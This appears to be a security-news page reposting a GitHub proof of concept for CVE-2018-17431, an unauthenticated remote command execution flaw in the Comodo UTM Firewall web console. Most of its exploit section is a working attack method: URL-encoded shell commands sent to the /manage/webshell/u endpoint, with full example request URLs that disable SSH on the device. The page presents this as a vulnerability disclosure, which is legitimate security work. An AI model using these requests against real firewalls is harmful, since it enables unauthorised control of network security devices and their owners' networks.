Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2018-17431: GitHub - Fadavvi/CVE-2018-17431-PoC: Proof of consept for CVE-2018-17431

Web Console in Comodo UTM Firewall before 2.7.0 allows remote attackers to execute arbitrary code without authentication via a crafted URL.

CVE
#web#windows#git#php#auth#ssh#chrome#firefox

CVE-2018-17431-PoC

Proof of consept for CVE-2018-17431

Exploit Title: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Command Execution (Web Shell based)****Exploit Author: Milad Fadavvi****Vendor Homepage: https://www.comodo.com/****Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276****Version: before 2.7.0 & 1.5.0****Tested on: Windows:firefox/chrome - Kali:firefox****Discovery Date: 2018-08-15 (reported in sameday)****Confirmation than bug exist: 2018-09-22 (Ticket ID: XWR-503-79437)****Patch released: 2018-11-23 Release Notes from Comodo

Exploit:

  1. WebShell simulation:

     For example disable SSH in web shell is like this:
         - service [hit enter]
         - ssh [hit enter]
         - disable [hit enter]
    
  2. Encode

     make above sequense encode with URL ECODING
     (I used burp encoder plugin)
    
     %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
    
  3. Run

     Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
     
     
               https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (extra enter key for run the command)
               
    
     Example: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
     
           https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
    

A page with “Configuration has been altered” message will show up and configuration changed!

With this technic, we can simulate all WebShell Commands.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907